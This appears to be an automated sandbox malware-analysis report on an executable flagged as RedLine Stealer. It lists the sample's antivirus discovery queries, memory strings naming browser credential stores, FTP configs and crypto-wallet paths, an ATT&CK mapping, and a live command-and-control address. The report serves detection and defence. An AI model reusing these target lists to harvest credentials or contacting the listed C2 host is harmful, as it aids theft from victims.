Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Users\user\Desktop\qJ64p5G1XJ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 4.2.qJ64p5G1XJ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qJ64p5G1XJ.exe.37d4128.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qJ64p5G1XJ.exe.37d4128.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qJ64p5G1XJ.exe.426b178.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qJ64p5G1XJ.exe.426b178.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1735815535.000000000426B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: qJ64p5G1XJ.exe PID: 6900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qJ64p5G1XJ.exe PID: 2196, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: qJ64p5G1XJ.exe, 00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002B57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: qJ64p5G1XJ.exe, 00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: qJ64p5G1XJ.exe, 00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002B57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: qJ64p5G1XJ.exe, 00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002B57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002B57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: Yara match	File source: 4.2.qJ64p5G1XJ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qJ64p5G1XJ.exe.37d4128.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qJ64p5G1XJ.exe.37d4128.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qJ64p5G1XJ.exe.426b178.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qJ64p5G1XJ.exe.426b178.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1735815535.000000000426B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: qJ64p5G1XJ.exe PID: 6900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qJ64p5G1XJ.exe PID: 2196, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 4.2.qJ64p5G1XJ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qJ64p5G1XJ.exe.37d4128.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qJ64p5G1XJ.exe.37d4128.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qJ64p5G1XJ.exe.426b178.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qJ64p5G1XJ.exe.426b178.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1735815535.000000000426B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: qJ64p5G1XJ.exe PID: 6900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qJ64p5G1XJ.exe PID: 2196, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	3 Data from Local System	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	241 Virtualization/Sandbox Evasion	Security Account Manager	241 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	113 System Information Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
qJ64p5G1XJ.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.RemcosRAT
qJ64p5G1XJ.exe	100%	Avira	HEUR/AGEN.1309499
qJ64p5G1XJ.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://45.137.22.227:5	0%	Avira URL Cloud	safe
http://45.137.22.227:55615t-	0%	Avira URL Cloud	safe
45.137.22.227:55615	0%	Avira URL Cloud	safe
http://45.137.22.227:55615	0%	Avira URL Cloud	safe
http://45.137.22.227:55615/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb.cdn.cloudflare.net	104.26.13.31	true	false		high
api.ip.sb	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
45.137.22.227:55615	true	Avira URL Cloud: safe	unknown
